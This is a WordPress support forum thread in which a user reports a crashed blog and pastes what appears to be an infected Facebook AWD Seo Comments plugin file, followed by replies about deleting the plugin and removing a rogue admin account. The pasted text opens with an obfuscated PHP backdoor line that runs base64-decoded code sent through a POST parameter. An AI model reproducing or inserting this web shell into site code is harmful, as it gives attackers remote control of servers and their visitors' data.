• Today when I went to pull up my blog, http://www.eureka-photography-blog.com, I get the error message as follows:

    $k=”ass”.”ert”; $k(base64_decode(${“_PO”.”ST”} [“waimaozhishen”])); /* Plugin Name: Facebook AWD Seo Comments Plugin URI: http://www.ahwebdev.fr Description: This plugin merge Facebook Comments with native WordPress Comments System and more… Need Facebook AWD All in One plugin. Version: 1.5.4 Author: AHWEBDEV Author URI: http://www.ahwebdev.fr License: AHWEBDEV Text Domain: AWD_facebook_seo_comments Last modification: 02/12/2012 */ /** * * @author alexhermann * */ add_action(‘plugins_loaded’, ‘initial_seo_comments’); function initial_seo_comments() { global $AWD_facebook; if(is_object($AWD_facebook)){ $model_path = $AWD_facebook->get_plugins_model_path(); require_once($model_path); require_once(dirname(__FILE__).’/inc/classes/class.AWD_facebook_seo_comments.php’); $AWD_facebook_seo_comments = new AWD_facebook_seo_comments(__FILE__,$AWD_facebook); } } ?>

    Whether I try to log in, or just try to pull up the public end of it, I get this error. Without being able to login I can’t disable the plugin or make any other corrections. Any idea what is going on or how I can fix it?

Viewing 2 replies - 1 through 2 (of 2 total)
  • JenR

    (@jennifer-roberts)

    You’ll need to access your site files on the server (using FTP) and delete that plugin from the plugins folder. If you don’t know how to use FTP, your hosting company can help you get that set up.

    I had the same :/ It’s because brute force. You need better WP security. [I’ve installed iThemes Security, which I recommend]
    I needed to delete false admin account [named admln (root@damin.com)], repair (reinstall) damaged plugin pages, and follow all most important steps as iThemes Security advised to do.
    Now I feel better 😉

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Blog crashed today related to Facebook AWD Seo Comments’ is closed to new replies.